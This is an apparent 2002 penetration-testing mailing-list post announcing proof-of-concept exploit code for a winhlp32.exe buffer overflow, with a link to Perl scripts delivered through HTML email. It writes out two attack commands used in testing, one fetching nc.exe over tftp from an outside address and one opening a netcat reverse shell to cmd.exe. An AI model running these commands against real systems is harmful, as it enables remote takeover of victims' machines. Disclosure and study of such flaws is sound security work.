From garyo@sec-1.com Thu Aug 15 00:48:20 2002
From: Gary O'leary-Steele
To: pen-test@securityfocus.com
Date: Mon, 12 Aug 2002 16:22:10 +0100
Subject: winhlp32.exe buffer overflow exploit code.

Hello all,

For some reason my previous posts did not make it onto SecurityFocus ?-)

The following is a link to proof of concept code / exploit code for this overflow. The shell code is relatively small but effective if used correctly. The perl script takes a command to execute (WinExec, SW_HIDE) and an html output file. There are two versions included in the zip.

http://www.sec-1.com/help.zip

HelpMe.pl  // Was written to work with my machine, Kernel32.dll version 5.0.2195.4272 (Rare ?)
HelpMe2.pl // Was written to work with all other machines I tested, kernel32.dll version 5.0.2195.2778

I have tested the exploit using two html emails.

email 1 Executes tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe
email 2 Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly ExitProcess() is called so no error occurs.

Kind Regards

Gary O'leary-Steele
XScan Team
www.Sec-1.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/